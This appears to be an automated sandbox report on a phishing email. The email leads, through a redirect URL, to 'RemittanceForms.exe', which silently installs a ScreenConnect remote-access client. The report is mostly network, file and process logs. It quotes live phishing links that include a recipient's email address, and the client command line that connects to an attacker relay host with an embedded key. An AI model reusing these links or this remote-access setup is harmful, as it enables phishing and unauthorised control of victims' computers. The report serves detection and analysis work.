Source: unknown	Network traffic detected: HTTP traffic on port 65449 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65430
Source: unknown	Network traffic detected: HTTP traffic on port 57367 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65440
Source: unknown	Network traffic detected: HTTP traffic on port 65444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65441
Source: unknown	Network traffic detected: HTTP traffic on port 57364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65439
Source: unknown	Network traffic detected: HTTP traffic on port 65438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65433
Source: unknown	Network traffic detected: HTTP traffic on port 65441 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65434
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65431
Source: unknown	Network traffic detected: HTTP traffic on port 57353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65432
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65437
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65438
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65435
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65436
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65451
Source: unknown	Network traffic detected: HTTP traffic on port 65443 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65452
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65450
Source: unknown	Network traffic detected: HTTP traffic on port 57365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65444
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65445
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65442
Source: unknown	Network traffic detected: HTTP traffic on port 65440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65448
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65449
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65446
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 57356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 57351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65453
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65454
Source: unknown	Network traffic detected: HTTP traffic on port 57359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65445 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57363 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57342
Source: unknown	Network traffic detected: HTTP traffic on port 65434 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57341
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65453 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57361 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57348
Source: unknown	Network traffic detected: HTTP traffic on port 57349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57353
Source: unknown	Network traffic detected: HTTP traffic on port 57346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57355
Source: unknown	Network traffic detected: HTTP traffic on port 65433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57351
Source: unknown	Network traffic detected: HTTP traffic on port 57358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57357
Source: unknown	Network traffic detected: HTTP traffic on port 57366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57367
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57360
Source: unknown	Network traffic detected: HTTP traffic on port 57341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57362
Source: unknown	Network traffic detected: HTTP traffic on port 65436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57363
Source: unknown	Network traffic detected: HTTP traffic on port 57355 -> 443

Source: unknown	HTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.16:65430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:65431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65432 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:65440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:65441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:65445 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.226.254:443 -> 192.168.2.16:65449 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\60deb4.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{4D240DE6-1466-DE28-8702-C81DB1981C9B}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE145.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE165.tmp
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE473.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\60deb6.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\60deb6.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{4D240DE6-1466-DE28-8702-C81DB1981C9B}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{4D240DE6-1466-DE28-8702-C81DB1981C9B}\DefaultIcon
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2B41.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2C0D.tmp
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{4D240DE6-1466-DE28-8702-C81DB1981C9B}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f3wa21dt.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f3wa21dt.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\tloof5fm.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\tloof5fm.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\dldqviai.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\dldqviai.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f2x22ccr.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f2x22ccr.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\njifspve.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\njifspve.newcfg
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9B53.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9BB1.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vd24ahbc.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vd24ahbc.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\owundbmf.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\owundbmf.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\t2v4cln3.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\t2v4cln3.newcfg

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIE165.tmp

Source: classification engine

Classification label: mal84.evad.winEML@69/73@33/121

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1092:120:WilError_03
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250116T1205530877-5980.etl

Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Users\user\Downloads\RemittanceForms.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "53F80022-4EA9-497D-ADFC-B51F6B36E8C3" "55C219FA-EE3D-4DAB-B2D6-DD10726AC0B1" "5980" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "53F80022-4EA9-497D-ADFC-B51F6B36E8C3" "55C219FA-EE3D-4DAB-B2D6-DD10726AC0B1" "5980" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
Source: unknown	Process created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
Source: C:\Users\user\Downloads\RemittanceForms.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50CA2B6AF1D72CC80C4E11E477922C45 C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID5DB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6346343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 12F154F86D29205A07CD9883F3F7AAB3
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 658C20DC4570CE36B0E2CFA7882ABE33 E Global\MSI0000
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=0dff7030-637d-4802-a9cf-5f63d3c8abe9&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&t=NewBuild"
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d631616b-045d-46ad-b654-67b074b7884f" "User"
